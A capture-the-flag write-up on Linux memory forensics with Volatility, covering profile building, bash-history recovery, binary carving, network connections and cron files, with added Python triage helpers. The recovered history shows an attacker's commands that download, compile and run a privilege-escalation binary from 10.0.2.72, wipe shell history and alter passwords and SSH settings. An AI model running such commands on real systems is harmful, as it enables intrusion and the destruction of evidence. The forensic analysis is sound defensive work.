THM | Profiles
A blue team challenge consisting of a memory forensics exercise.
Description:
The incident response team has alerted you that there was some suspicious activity on one of the Linux database servers.
A memory dump of the server was taken and provided to you for analysis. You advise the team that you are missing crucial information from the server, but it has already been taken offline. They just made your job a little harder, but not impossible.
Click on the Download Task Files button at the top of this task. You will be provided with an evidence.zip file.
Extract the zip file’s contents and begin your analysis in order to answer the questions.
Note: The challenge is best done using your own environment. I recommend using Volatility 2.6.1 to handle this task and strongly advise using this article by Sean Whalen to aid you with the Volatility installation.
Volatility 2 needs a profile for the exact kernel the dump was taken from in order to read that operating system's distinctive structures and data: the profile packages the kernel's debugging symbols (the DWARF information of a module built against that kernel) together with its System.map. Without the proper profile the program cannot correctly map and decode the raw binary data of the memory dump, which results in incorrect analysis or missing forensic findings.
vol -f linux.mem banner
Volatility 3 Framework 2.28.0
Progress: 100.00 PDB scanning finished
Offset Banner
0x2f9c4c88 Linux version 5.4.0-166-generic (buildd@lcy02-amd64-011) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)) #183-Ubuntu SMP Mon Oct 2 11:28:33 UTC 2023 (Ubuntu 5.4.0-166.183-generic 5.4.252)
0xa707c8c8 Linux version 5.4.0-166-generic (buildd@lcy02-amd64-011) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)) #183-Ubuntu SMP Mon Oct 2 11:28:33 UTC 2023 (Ubuntu 5.4.0-166.183-generic 5.4.252)
0xd46001a0 Linux version 5.4.0-166-generic (buildd@lcy02-amd64-011) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)) #183-Ubuntu SMP Mon Oct 2 11:28:33 UTC 2023 (Ubuntu 5.4.0-166.183-generic 5.4.252)
0xd619de54 Linux version 5.4.0-166-generic (buildd@lcy02-amd64-011) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)) #183-Ubuntu SMP Mon Oct 2 11:28:33 UTC 2023 (Ubuntu 5.4.0-166.183-generic 5.4.252)
0x106d64c88 Linux version 5.4.0-166-generic (buildd@lcy02-amd64-011) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)) #183-Ubuntu SMP Mon Oct 2 11:28:33 UTC 2023 (Ubuntu 5.4.0-166.183-generic 5.4.252)
We are dealing with Ubuntu 20.04.2 running on the 5.4.0-166-generic kernel, so that is the kernel the profile has to be built for.
Setting up the profile, step by step:
Step 1: Clone Volatility & Patch Makefile
cd ~/tools
git clone https://github.com/volatilityfoundation/volatility.git volatility_profile
cd volatility_profile/tools/linux
sed -i 's/$(shell uname -r)/5.4.0-166-generic/g' Makefile
Step 2: Build Profile via Docker
docker run -it --rm -v $PWD:/volatility ubuntu:20.04 /bin/bash
Inside the container:
apt update && apt install -y linux-image-5.4.0-166-generic \
linux-headers-5.4.0-166-generic build-essential dwarfdump make zip
cd /volatility
make -C /usr/src/linux-headers-5.4.0-166-generic M=$(pwd) modules
dwarfdump -di module.ko > module.dwarf
zip Ubuntu_5.4.0-166.zip module.dwarf /boot/System.map-5.4.0-166-generic
exit
Step 3: Install Profile
cp ~/tools/volatility_profile/tools/linux/Ubuntu_5.4.0-166.zip \
~/.local/lib/python2.7/site-packages/volatility/plugins/overlays/linux/
Step 4: Verify
vol.py --info | grep "5.4.0-166"
# Output: LinuxUbuntu_5_4_0-166x64 - A Profile for Linux Ubuntu_5.4.0-166 x64
vol.py -f linux.mem --profile=LinuxUbuntu_5_4_0-166x64 linux_banner
# Output: Linux version 5.4.0-166-generic ...
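Added example (not part of the original writeup): a small Python helper that pulls the kernel release and Ubuntu series out of a banner line like the ones above, lists the packages and paths the build needs for exactly that release, and reproduces the rule by which Volatility 2 turns the zip name into the --profile value, with a mismatch check. The function names and the sample line are mine.

```python
import re

# Constructed sample input: one line of the `vol -f linux.mem banner` output above.
BANNER_LINE = ("0x2f9c4c88 Linux version 5.4.0-166-generic (buildd@lcy02-amd64-011) "
               "(gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)) #183-Ubuntu SMP "
               "Mon Oct 2 11:28:33 UTC 2023 (Ubuntu 5.4.0-166.183-generic 5.4.252)")

def parse_banner(line):
    """Pull the kernel release and the Ubuntu series out of one banner line."""
    rel = re.search(r"Linux version (\S+)", line)
    series = re.search(r"\(Ubuntu [^)]*~(\d+\.\d+)\.\d+\)", line)
    if not rel or not series:
        raise ValueError("not an Ubuntu kernel banner: %r" % line)
    return {"release": rel.group(1), "series": series.group(1)}

def build_inputs(release):
    """Packages and paths the profile build (steps 2 and 3 above) needs for this release."""
    return {
        "packages": ["linux-image-" + release, "linux-headers-" + release],
        "headers": "/usr/src/linux-headers-" + release,
        "system_map": "/boot/System.map-" + release,
    }

def profile_name(zip_name, arch="x64"):
    """Volatility 2 names a Linux profile after the overlay zip it finds:
    'Ubuntu_5.4.0-166.zip' becomes 'LinuxUbuntu_5_4_0-166x64' (see Step 4)."""
    base = zip_name[:-4] if zip_name.endswith(".zip") else zip_name
    return "Linux" + base.replace(".", "_") + arch

def profile_matches(zip_name, release):
    """A profile built from another kernel's symbols decodes the dump wrongly or not
    at all, so insist that the zip name carries the release (flavour suffix dropped)."""
    return release.split("-generic")[0] in zip_name

if __name__ == "__main__":
    info = parse_banner(BANNER_LINE)
    print(info, build_inputs(info["release"]))
    zip_name = "Ubuntu_%s.zip" % info["release"].split("-generic")[0]
    print(zip_name, "->", profile_name(zip_name), profile_matches(zip_name, info["release"]))
```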
FIRST QUESTION
The linux_bash plugin recovers the command history still held in the memory of each bash process, which gives us the attacker's timeline:
vol.py -f linux.mem --profile=LinuxUbuntu_5_4_0-166x64 linux_bash
Pid Name Command Time Command
-------- -------------------- ------------------------------ -------
1076 bash 2023-11-07 03:49:45 UTC+0000 su root[REDACTED]
1076 bash 2023-11-07 03:49:45 UTC+0000 sqlite3 users.db
1076 bash 2023-11-07 03:49:45 UTC+0000 @????U
1076 bash 2023-11-07 03:49:45 UTC+0000 su root
1076 bash 2023-11-07 03:50:11 UTC+0000 wget 10.0.2.72/shell.c && gcc shell.c -o pkexecc && rm shell.c
1076 bash 2023-11-07 03:50:17 UTC+0000 ./pkexecc
1197 bash 2023-11-07 03:51:49 UTC+0000 apt-get update --fix-missing
1197 bash 2023-11-07 03:51:49 UTC+0000 apt-get update --fix-missing
1197 bash 2023-11-07 03:51:49 UTC+0000 apt-get update --fix-missing
1197 bash 2023-11-07 03:51:49 UTC+0000 ls
1197 bash 2023-11-07 03:51:49 UTC+0000 apt-get install build-essential linux-headers-`uname -r` git python dwarfdump zip -y
1197 bash 2023-11-07 03:51:49 UTC+0000 passwd paco
1197 bash 2023-11-07 03:51:49 UTC+0000 cat /dev/null > /home/paco/.bash_history
1197 bash 2023-11-07 03:51:49 UTC+0000 passwd root
1197 bash 2023-11-07 03:51:49 UTC+0000 exit
1197 bash 2023-11-07 03:51:49 UTC+0000 rm shell.c
1197 bash 2023-11-07 03:51:49 UTC+0000 ls
1197 bash 2023-11-07 03:51:49 UTC+0000 systemctl restart sshd
1197 bash 2023-11-07 03:51:49 UTC+0000 ls
1197 bash 2023-11-07 03:51:49 UTC+0000 which gcc
1197 bash 2023-11-07 03:51:49 UTC+0000 apt-get --fix-missing
1197 bash 2023-11-07 03:51:49 UTC+0000 reboot
1197 bash 2023-11-07 03:51:49 UTC+0000 ???2?
1197 bash 2023-11-07 03:51:49 UTC+0000 clear
1197 bash 2023-11-07 03:51:49 UTC+0000 vi /root/.bashrc
1197 bash 2023-11-07 03:51:49 UTC+0000 apt-get install sqlite3 python3-pip -y
1197 bash 2023-11-07 03:51:49 UTC+0000 cat /dev/null > /home/paco/.bash_history
1197 bash 2023-11-07 03:51:49 UTC+0000 groups paco
1197 bash 2023-11-07 03:51:49 UTC+0000 apt-get update -y && apt-get upgrade -y
1197 bash 2023-11-07 03:51:49 UTC+0000 exit
1197 bash 2023-11-07 03:51:49 UTC+0000 wget 10.0.2.72/shell.c
1197 bash 2023-11-07 03:51:49 UTC+0000 gcc shell.c -o pkexecc
1197 bash 2023-11-07 03:51:49 UTC+0000 apt-get install build-essential linux-headers-`uname -r` git python dwarfdump zip -y
1197 bash 2023-11-07 03:51:49 UTC+0000 cat /dev/null > .bash_history
1197 bash 2023-11-07 03:51:49 UTC+0000 snap remove lxd
1197 bash 2023-11-07 03:51:49 UTC+0000 cat /dev/null > /home/paco/.bash_history
1197 bash 2023-11-07 03:51:49 UTC+0000 gpasswd -d paco lxd
1197 bash 2023-11-07 03:51:49 UTC+0000 systemctl restart ssh
1197 bash 2023-11-07 03:51:49 UTC+0000 vi /etc/ssh/sshd_config
1197 bash 2023-11-07 03:51:49 UTC+0000 exit
1197 bash 2023-11-07 03:52:07 UTC+0000 git clone https://github.com/504ensicsLabs/LiME && cd LiME/src/
1197 bash 2023-11-07 03:52:12 UTC+0000 make
1197 bash 2023-11-07 03:52:21 UTC+0000 ls
1197 bash 2023-11-07 03:52:37 UTC+0000 insmod lime-5.4.0-166-generic.ko "path=/home/paco/linux.mem format=lime"
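Added example, not from the original writeup: a Python triage pass over linux_bash rows in the format above, tagging the download-compile-run chain, the history wipes and the account/SSH changes so an analyst does not have to read the whole history by eye. The sample rows are constructed from the output above and the tag names are my own.

```python
import re

# Constructed sample rows in the format of the linux_bash output above.
BASH_LINES = """\
1076 bash 2023-11-07 03:49:45 UTC+0000 sqlite3 users.db
1076 bash 2023-11-07 03:50:11 UTC+0000 wget 10.0.2.72/shell.c && gcc shell.c -o pkexecc && rm shell.c
1076 bash 2023-11-07 03:50:17 UTC+0000 ./pkexecc
1197 bash 2023-11-07 03:51:49 UTC+0000 passwd root
1197 bash 2023-11-07 03:51:49 UTC+0000 cat /dev/null > /home/paco/.bash_history
1197 bash 2023-11-07 03:51:49 UTC+0000 vi /etc/ssh/sshd_config
""".splitlines()

ROW = re.compile(r"^\s*(\d+)\s+(\S+)\s+(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} UTC[+-]\d{4})\s+(.*)$")

def parse_bash(lines):
    """Yield (pid, time, command); the header, separator and garbage rows do not match."""
    for line in lines:
        m = ROW.match(line)
        if m:
            yield int(m.group(1)), m.group(3), m.group(4).strip()

def triage(lines):
    """Return (time, pid, tags, command) for every row showing a behaviour worth a look."""
    built = set()        # outputs of gcc -o, so a later ./name is linked to its compile
    findings = []
    for pid, when, cmd in parse_bash(lines):
        tags = []
        if re.search(r"\b(wget|curl)\s+\S+", cmd):
            tags.append("remote_fetch")            # source pulled from another host
        out = re.search(r"\bgcc\b.*?-o\s+(\S+)", cmd)
        if out:
            built.add(out.group(1))
            tags.append("compile")
        if any(cmd.startswith("./" + b) for b in built):
            tags.append("run_compiled")            # execution of what was just built
        if re.search(r">\s*\S*\.bash_history\b", cmd):
            tags.append("history_wipe")            # anti-forensics: history truncated
        if re.search(r"\b(passwd|gpasswd)\b|sshd_config", cmd):
            tags.append("account_or_ssh_change")   # credential / access changes
        if tags:
            findings.append((when, pid, ",".join(tags), cmd))
    return findings

if __name__ == "__main__":
    for when, pid, tags, cmd in triage(BASH_LINES):
        print(when, pid, tags.ljust(22), cmd)
```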
SECOND QUESTION
Based on the bash history we can see that the user compiled and ran a file named pkexecc. Using this finding we enumerate the files: linux_enumerate_files lists every file cached in memory, grep filters the output down to the name we want, and the inode address it prints is what linux_find_file needs to carve the file out.
vol.py -f linux.mem --profile=LinuxUbuntu_5_4_0-166x64 linux_enumerate_files | grep pkexec
Volatility Foundation Volatility Framework 2.6.1
0xffff8903b2364120 655377 /home/paco/pkexecc
vol.py -f linux.mem --profile=LinuxUbuntu_5_4_0-166x64 linux_find_file -i 0xffff8903b2364120 -O pkexecc
md5sum pkexecc
[REDACTED] pkexecc
THIRD QUESTION
linux_bash already gave us the IP address 10.0.2.72, so we use linux_netstat to dump the network connections held in the memory image and check what is talking to that host. Note the same established TCP socket to 10.0.2.72 owned in turn by sh, su and bash, plus a separate SSH session coming in from 10.0.2.72.
vol.py -f linux.mem --profile=LinuxUbuntu_5_4_0-166x64 linux_netstat
TCP 10.0.2.73 :41012 10.0.2.72 : [REDACTED] ESTABLISHED sh/1093
TCP 10.0.2.73 :41012 10.0.2.72 : [REDACTED] ESTABLISHED sh/1093
TCP 10.0.2.73 :41012 10.0.2.72 : [REDACTED] ESTABLISHED sh/1093
TCP 10.0.2.73 :41012 10.0.2.72 : [REDACTED] ESTABLISHED sh/1093
TCP 10.0.2.73 :41012 10.0.2.72 : [REDACTED] ESTABLISHED su/1095
TCP 10.0.2.73 :41012 10.0.2.72 : [REDACTED] ESTABLISHED su/1095
TCP 10.0.2.73 :41012 10.0.2.72 : [REDACTED] ESTABLISHED su/1095
TCP 10.0.2.73 :41012 10.0.2.72 : [REDACTED] ESTABLISHED su/1095
UNIX 26341 su/1095
TCP 10.0.2.73 :41012 10.0.2.72 : [REDACTED] ESTABLISHED bash/1097
TCP 10.0.2.73 :41012 10.0.2.72 : [REDACTED] ESTABLISHED bash/1097
TCP 10.0.2.73 :41012 10.0.2.72 : [REDACTED] ESTABLISHED bash/1097
TCP 10.0.2.73 :41012 10.0.2.72 : [REDACTED] ESTABLISHED bash/1097
UNIX 26358 sshd/1099
TCP 10.0.2.73 : 22 10.0.2.72 :57690 ESTABLISHED sshd/1099
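Added example (not the writeup's own code): a parser for linux_netstat rows that de-duplicates the repeated socket entries and flags established TCP sockets owned by a shell-like process, the reverse-shell footprint visible above. The rows are constructed from the output; since the page redacts the peer port, 9999 is a placeholder.

```python
import re
from collections import defaultdict

SHELLS = {"sh", "bash", "dash", "zsh", "su"}   # processes that should own no TCP socket

# Constructed rows in the format of the linux_netstat output above; the page redacts
# the peer port, so 9999 is a placeholder rather than the real value.
NETSTAT_LINES = """\
TCP 10.0.2.73 :41012 10.0.2.72 : 9999 ESTABLISHED sh/1093
TCP 10.0.2.73 :41012 10.0.2.72 : 9999 ESTABLISHED sh/1093
TCP 10.0.2.73 :41012 10.0.2.72 : 9999 ESTABLISHED su/1095
UNIX 26341 su/1095
TCP 10.0.2.73 :41012 10.0.2.72 : 9999 ESTABLISHED bash/1097
TCP 10.0.2.73 : 22 10.0.2.72 :57690 ESTABLISHED sshd/1099
TCP 0.0.0.0 : 22 0.0.0.0 : 0 LISTEN sshd/700
""".splitlines()

TCP_ROW = re.compile(r"^\s*TCP\s+(\S+)\s*:\s*(\d+)\s+(\S+)\s*:\s*(\d+)\s+(\S+)\s+(\S+)/(\d+)\s*$")

def parse_tcp(lines):
    """Distinct TCP sockets as (laddr, lport, raddr, rport, state, comm, pid).
    The plugin prints a socket once per open descriptor, hence the de-duplication."""
    rows = []
    for line in lines:
        m = TCP_ROW.match(line)          # UNIX sockets, headers and garbage do not match
        if m:
            row = (m.group(1), int(m.group(2)), m.group(3), int(m.group(4)),
                   m.group(5), m.group(6), int(m.group(7)))
            if row not in rows:
                rows.append(row)
    return rows

def shell_connections(lines):
    """Established sockets owned by a shell-like process and pointing off-host:
    the reverse-shell footprint of the sh -> su -> bash chain shown above."""
    return [r for r in parse_tcp(lines)
            if r[4] == "ESTABLISHED" and r[5] in SHELLS and not r[2].startswith("127.")]

def peers(lines):
    """Remote address -> set of comm/pid holding an established socket to it."""
    out = defaultdict(set)
    for r in parse_tcp(lines):
        if r[4] == "ESTABLISHED":
            out[r[2]].add("%s/%d" % (r[5], r[6]))
    return dict(out)

if __name__ == "__main__":
    for r in shell_connections(NETSTAT_LINES):
        print("reverse-shell candidate:", r)
    print(peers(NETSTAT_LINES))
```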
FOURTH QUESTION
We need to find the right cron file. linux_enumerate_files with a case-insensitive grep for "cron" lists every cron-related path cached in memory:
vol.py -f linux.mem --profile=LinuxUbuntu_5_4_0-166x64 linux_enumerate_files | grep -i "cron"
Volatility Foundation Volatility Framework 2.6.1
0xffff890490abfb80 690 /run/crond.reboot
0xffff89048a49f5e0 687 /run/crond.pid
0xffff89048a49d150 680 /run/systemd/units/invocation:cron.service
0xffff890499e90dc0 131180 /var/spool/cron
0xffff890499fa1650 131184 /var/spool/cron/crontabs
0xffff8903b23667a8 131127 /var/spool/cron/crontabs/root
0xffff890499f6f038 131182 /var/spool/cron/atjobs
0xffff89049a16e360 13246 /usr/sbin/cron
0xffff890499fa0dc0 524314 /etc/cron.d
0xffff890499fa3890 525443 /etc/cron.d/e2scrub_all
0xffff890499fa67a8 525444 /etc/cron.d/popularity-contest
0xffff890499fa4120 524970 /etc/crontab
0xffff89048e4a5240 525520 /etc/init.d/cron
0xffff890499e95ad0 525468 /etc/default/cron
FIFTH QUESTION
After picking the correct cron file from the listing above, carve it out with linux_find_file (the inode address is redacted here) and read it for the final flag:
vol.py -f linux.mem --profile=LinuxUbuntu_5_4_0-166x64 linux_find_file -i [REDACTED] -O cron
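Added example serving the second, fourth and fifth questions (not code from the original writeup): parse linux_enumerate_files rows into path -> inode address, look up an entry by basename (pkexecc), shortlist the paths cron actually reads job definitions from, and assemble the linux_find_file command. The sample rows are taken from the listings above; the helper names are mine.

```python
import re
import shlex

# Constructed sample rows taken from the linux_enumerate_files listings above.
ENUM_LINES = """\
Volatility Foundation Volatility Framework 2.6.1
0xffff8903b2364120 655377 /home/paco/pkexecc
0xffff890499fa1650 131184 /var/spool/cron/crontabs
0xffff8903b23667a8 131127 /var/spool/cron/crontabs/root
0xffff890499fa3890 525443 /etc/cron.d/e2scrub_all
0xffff890499fa4120 524970 /etc/crontab
0xffff89048e4a5240 525520 /etc/init.d/cron
""".splitlines()

ROW = re.compile(r"^\s*(0x[0-9a-f]+)\s+(\d+)\s+(\S.*?)\s*$")

# Locations cron reads job definitions from; /etc/init.d/cron, /etc/default/cron
# and /usr/sbin/cron belong to the service itself and carry no schedule.
CRON_JOB_PATHS = (r"^/var/spool/cron/crontabs/[^/]+$", r"^/etc/cron\.d/[^/]+$",
                  r"^/etc/crontab$", r"^/etc/cron\.(hourly|daily|weekly|monthly)/[^/]+$")

def parse_enum(lines):
    """Map path -> (inode address, inode number); the framework banner does not match."""
    out = {}
    for line in lines:
        m = ROW.match(line)
        if m:
            out[m.group(3)] = (m.group(1), int(m.group(2)))
    return out

def find_inode(lines, name):
    """(path, inode address) for every entry whose basename is `name` (linux_find_file -i)."""
    return [(p, a) for p, (a, _) in parse_enum(lines).items()
            if p.rsplit("/", 1)[-1] == name]

def cron_candidates(lines):
    """Cached files that can hold a scheduled job; directories and daemon files are dropped."""
    return sorted(p for p in parse_enum(lines)
                  if any(re.match(rx, p) for rx in CRON_JOB_PATHS))

def find_file_cmd(image, profile, addr, out):
    """Assemble the linux_find_file invocation used in the second and fifth questions."""
    argv = ["vol.py", "-f", image, "--profile=" + profile,
            "linux_find_file", "-i", addr, "-O", out]
    return " ".join(shlex.quote(a) for a in argv)

if __name__ == "__main__":
    for path, addr in find_inode(ENUM_LINES, "pkexecc"):
        print(find_file_cmd("linux.mem", "LinuxUbuntu_5_4_0-166x64", addr, "pkexecc"))
    print(cron_candidates(ENUM_LINES))
```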